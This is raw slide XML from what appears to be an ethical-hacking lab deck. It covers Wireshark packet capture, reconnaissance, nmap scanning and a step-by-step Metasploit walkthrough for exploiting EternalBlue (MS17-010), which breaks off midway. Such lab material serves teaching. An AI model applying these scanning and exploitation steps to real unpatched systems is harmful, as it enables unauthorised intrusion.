          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="74249103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34" y="811659"/>
            <a:ext cx="8743309" cy="4160822"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544530" y="277402"/>
            <a:ext cx="3908442" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now we will send 2000 packets as shown in fig</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="21187124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677" y="791110"/>
            <a:ext cx="8455632" cy="4273838"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="523982" y="226031"/>
            <a:ext cx="7516801" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now open </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wireshark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and see all those packets have been captured here , now we can easily</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>a</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nalyse</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> it using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>wirehark</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="368646757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02" y="739738"/>
            <a:ext cx="8486454" cy="4325209"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="626724" y="246580"/>
            <a:ext cx="5070619" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Double click on whatever packet you want to see and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>analyse</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="200289339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28" y="750012"/>
            <a:ext cx="8681664" cy="4181371"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="TextBox 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="267128" y="154113"/>
            <a:ext cx="8828058" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here you can see all the information about packets , its </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> address , its destination address ,internet protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>version and even more </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="34950918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419" y="482884"/>
            <a:ext cx="8455632" cy="4660615"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="291617008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886" y="314857"/>
            <a:ext cx="8363164" cy="4719268"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="35339945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7129" y="441787"/>
            <a:ext cx="8342615" cy="3970318"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>E</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>xp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> no 21 : Exploiting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Eternal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>blue </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>vunerability</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> is both the given name to a series of </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Microsoft software vulnerabilities and the exploit created by the NSA as a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>cyberattack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> tool.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Although the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>EternalBlue</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> exploit — officially named MS17-010 by Microsoft — affects only Windows operating systems, anything that uses the SMBv1 (Server Message Block version 1) file-sharing protocol is technically at risk of being targeted for </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ransomware</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and other </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>cyberattacks</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The MS17-010 patch was designed to fix the SMBv1 software flaws for all supported Windows operating systems, including </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Windows Vista, Windows 7, Windows 8.1, Windows 10, Windows Server 2008, Windows Server 2012, and Windows Server 2016</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. Microsoft also automatically disabled SMBv1 in the latest versions of Windows 10 and Windows Servers 2012 and 2016 by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>default</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>As the above information Microsoft has found patch and fixed eternal blue vulnerability , we can till find </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>his only in not upgraded windows machine since the vulnerability found</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now its hard to exploit eternal blue as they already fixed it in all windows </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>os</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> so still we will see steps</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>How to do it , as how black hat hackers did at that time</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="118452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4"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="264600" y="1826725"/>
            <a:ext cx="8614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64D79"/>
                </a:solidFill>
                <a:latin typeface="Calibri"/>
                <a:ea typeface="Calibri"/>
                <a:cs typeface="Calibri"/>
                <a:sym typeface="Calibri"/>
              </a:rPr>
              <a:t>1. To perform active and passive reconnaissance using Meltago and HTtrack mirroring tools to collect technical information from any website.</a:t>
            </a:r>
            <a:endParaRPr b="1">
              <a:solidFill>
                <a:srgbClr val="A64D79"/>
              </a:solidFill>
              <a:latin typeface="Calibri"/>
              <a:ea typeface="Calibri"/>
              <a:cs typeface="Calibri"/>
              <a:sym typeface="Calibri"/>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1"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="145575" y="573281"/>
            <a:ext cx="86370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sz="2800"/>
              <a:t>Port Scanning and Network Scaning using NMAP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="385" name="Google Shape;385;p61"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="514350" y="1645913"/>
            <a:ext cx="4071000" cy="969900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="68575" tIns="34275" rIns="68575" bIns="34275" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" marR="241300" lvl="0" indent="-279400" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClr>
                <a:srgbClr val="0A0A23"/>
              </a:buClr>
              <a:buSzPts val="1800"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800" b="1">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Ping scan — </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:solidFill>
                  <a:srgbClr val="0A0A23"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:ea typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>Scans the list of devices up and running on a given subnet.</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:solidFill>
                <a:srgbClr val="0A0A23"/>
              </a:solidFill>
              <a:latin typeface="Arial"/>
              <a:ea typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="139700" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1800">
                <a:latin typeface="Roboto Mono"/>
                <a:ea typeface="Roboto Mono"/>
                <a:cs typeface="Roboto Mono"/>
                <a:sym typeface="Roboto Mono"/>
              </a:rPr>
              <a:t>&gt; nmap -sp 192.168.1.1/24</a:t>
            </a:r>
            <a:endParaRPr sz="1800">
              <a:latin typeface="Roboto Mono"/>
              <a:ea typeface="Roboto Mono"/>
              <a:cs typeface="Roboto Mono"/>
              <a:sym typeface="Roboto Mono"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="139700" lvl="0" indent="0" algn="l" rtl="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="2500"/>
              </a:spcAft>
              <a:buSzPts val="1400"/>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr sz="1800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="386" name="Google Shape;386;p61"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4257938" y="1310138"/>
            <a:ext cx="4706794" cy="3699918"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>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35" y="1325366"/>
            <a:ext cx="8691938" cy="3606018"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="421240" y="328773"/>
            <a:ext cx="7720383" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>First step is to gather information about the target , here we are using </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>nmap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> to see all the open </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>ports and the operating system which the target is using </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="131422668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06" y="1171253"/>
            <a:ext cx="8712485" cy="3677937"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544530" y="441789"/>
            <a:ext cx="7726795" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After running the command as shown above we will find all open port and service the target is</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>using , if the target Is vulnerable to eternal blue in services  it will show it is vulnerable to smbv1</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298418132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854" y="1304818"/>
            <a:ext cx="8537825" cy="3626566"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="636998" y="482885"/>
            <a:ext cx="7378943" cy="738664"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Here in todays updated windows we cant see that vulnerability any more as Microsoft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Has patched that vulnerability, but still we will see steps how to do if found any un updated </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>system</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="344270446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09" y="1212350"/>
            <a:ext cx="8671390" cy="3719033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="534256" y="410966"/>
            <a:ext cx="4461478" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>To exploit eternal blue run </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> terminal</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="215427427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30" y="1438381"/>
            <a:ext cx="8712487" cy="3564921"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="544530" y="523982"/>
            <a:ext cx="8569975" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>After that first step is to search for eternal blue as shown , now use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>auxillary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/scanner/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>smb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>/smb_ms17_010</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="298551442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48" y="1140430"/>
            <a:ext cx="8209051" cy="3924517"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="513708" y="359596"/>
            <a:ext cx="7885492" cy="523220"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now we are inside that , see options , now set for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>rhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> as shown . If eternal blue still exist</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>hen it will automatic on port 445 no need to change,  then run  if it is vulnerable it will show it exist</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="188318092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24" y="1366463"/>
            <a:ext cx="8496728" cy="3585469"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="554804" y="400692"/>
            <a:ext cx="5615640" cy="307777"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Now again search for eternal blue , then use 0 as shown see options</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="172740886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967" y="1068512"/>
            <a:ext cx="8342615" cy="3947033"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="TextBox 2"/>
          <p:cNvSpPr txBox="1"/>
